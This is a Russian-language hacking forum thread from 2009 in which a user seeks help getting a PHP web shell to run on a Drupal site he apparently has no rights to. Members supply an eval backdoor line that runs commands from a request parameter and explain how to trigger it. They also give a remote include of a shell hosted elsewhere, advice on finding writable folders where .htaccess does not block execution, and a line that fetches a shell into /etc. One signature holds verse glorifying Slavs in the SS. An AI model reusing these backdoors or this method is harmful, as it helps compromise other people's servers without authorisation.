Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Drupal: получилось испольнить php-код шелла, но проблема. ПОМОГИТЕ! |
24.12.2009, 14:14
|
|
Новичок
Регистрация: 06.10.2009
Сообщений: 16
Провел на форуме:
52653
Репутация:
5
|
|
Drupal: получилось испольнить php-код шелла, но проблема. ПОМОГИТЕ!
Получилось таким способом исполнить шел: http://forum.antichat.ru/showpost.php?p=1756391&postcount=6
Всё загрузил, но у меня не открывается шелл, а просто предлагается скачать файл php. Пробываал разные браузеры. Не знаю как быть.
Потом воспользовался другим способом. Создал тему, сделал её phpшной.
Вписал в тему сначала <?php include 'http://www.site.ru/files/c99.php3' ?>
Потом целиком код шелла. При первой загрузке такой странице шелл отображается, но когда пытаюсь сделать какое либо действие, меня кидает уже на обычную страницу с ошибками:
warning: Invalid argument supplied for foreach() in /var/www/htdocs/www.site.ru/includes/common.inc(1343) : eval()'d code(2) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 184.
Подскажите как быть. Провозился целый день. Шелы залиты на сервак, но не срабатывают а лиш скачиваются. Да и через тему не получается.
Пожскажите, может быть возможно исполнить какой-либо php-код который загрузить шелл в нужную мне папку. Я посмотрел. У них они там все почти пригодны для этого.
Очень жду ответа.
|
|
|
24.12.2009, 14:24
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Значит не дурачки админы, тот способ проверялся на Win-платформе, скорее всего правильно расставленные(настроенные) .htaccess
Попробуй вместо "<?php include 'http://www.site.ru/files/c99.php3' ?>" сделай "if (isset($_REQUEST[cmd])) eval(stripslashes($_REQUEST[cmd]));" и посмотри все папки доступные на запись + их содержимое, учитывая .htaccess-ы сверху и внутри и их содержимое, т.е. нужно искать папку, доступную на запись и где нет ограничений на исполнение файлов. Если только корень - значит лить в корень
PS: Уверен что версия 6.14? Такой способ заливки
http://forum.antichat.ru/showpost.php?p=1756391&postcount=6
канает только на ней
еще раз проверил - по умолчанию никаких ограничений в этой ветке нет на исполнение .php3 из http://site.ru/sites/default/files/wso2.php3, файл исполняется, не скачивается
Последний раз редактировалось Pashkela; 24.12.2009 в 14:41..
|
|
|
|
24.12.2009, 15:02
|
|
Новичок
Регистрация: 06.10.2009
Сообщений: 16
Провел на форуме:
52653
Репутация:
5
|
|
Вот на эту строку if (isset($_REQUEST[cmd])) eval(stripslashes($_REQUEST[cmd])); сайт никак не реагирует. В папки которые можно залить шелл я и так вижу, так как один раз шелл срабатывает и я вижу корень с папками и их правами. В корень залить точно можно.
Подскажите код скрипта который можно было бы выполнить, чтобы он закачал файл в корень. Очень жду совета. Надо довести дело до конца)))
Pashkela, спасибо что откликнулся  |
|
|
|
24.12.2009, 15:14
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от Arkaim
Вот на эту строку if (isset($_REQUEST[cmd])) eval(stripslashes($_REQUEST[cmd])); сайт никак не реагирует. В папки которые можно залить шелл я и так вижу, так как один раз шелл срабатывает и я вижу корень с папками и их правами. В корень залить точно можно.
Подскажите код скрипта который можно было бы выполнить, чтобы он закачал файл в корень. Очень жду совета. Надо довести дело до конца)))
Pashkela, спасибо что откликнулся
Как это никак не реагирует? Ты же сказал, что php-скрипты в теме исполняются. Создай тему, туда пихни этот код, а потом вызови скрипт с параметром ?cmd=phpinfo();, например.
|
|
|
|
24.12.2009, 15:24
|
|
Новичок
Регистрация: 06.10.2009
Сообщений: 16
Провел на форуме:
52653
Репутация:
5
|
|
Сообщение от Root-access
Как это никак не реагирует? Ты же сказал, что php-скрипты в теме исполняются. Создай тему, туда пихни этот код, а потом вызови скрипт с параметром ?cmd=phpinfo();, например.
Вот с параметром сработало  Я просто в пхп не силён, поэтому туплю.
PHP Info показалось. Что дальше? Как мне это поможет? Вы уж простите если совсем тупые вопросы...
|
|
|
|
24.12.2009, 15:03
|
|
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415
Репутация:
1398
|
|
в этом двиге .htaccess в некоторых директорях обрубает php скрипты, то есть если ты даже залил, то код тупо не будет исполняется. Помойму папка случаем не files называется?
|
|
|
|
24.12.2009, 15:20
|
|
Новичок
Регистрация: 06.10.2009
Сообщений: 16
Провел на форуме:
52653
Репутация:
5
|
|
Сообщение от SanyaX
в этом двиге .htaccess в некоторых директорях обрубает php скрипты, то есть если ты даже залил, то код тупо не будет исполняется. Помойму папка случаем не files называется?
именно так.
а как же быть тогда? должен же быть выход... например если в статье исполнить какой-нить скрипт который загрузит шелл в другую папку или в корень например. или так нельзя?
|
|
|
|
24.12.2009, 16:04
|
|
Новичок
Регистрация: 06.10.2009
Сообщений: 16
Провел на форуме:
52653
Репутация:
5
|
|
И так не получается. Прав не хватает. Не загружается шел в папки /etc/, /tmp/ (((((((
|
|
|
|
24.12.2009, 16:08
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от Arkaim
И так не получается. Прав не хватает. Не загружается шел в папки /etc/, /tmp/ (((((((
да в тмп накосячил чуть
с чего ты решил что не грузит в папку /tmp/?
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
24.12.2009, 16:19
|
|
Новичок
Регистрация: 06.10.2009
Сообщений: 16
Провел на форуме:
52653
Репутация:
5
|
|
Сообщение от HAXTA4OK
да в тмп накосячил чуть
с чего ты решил что не грузит в папку /tmp/?
Потому что вот такой скрипт <?php curl('http://www.site.ru/files/wso2.txt','/etc/shell.php'); ?>
не выполняется. пишется готово и белая страница. и инклуд <?php include '/etc/shell.php' ?> не происходит
как же быть?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид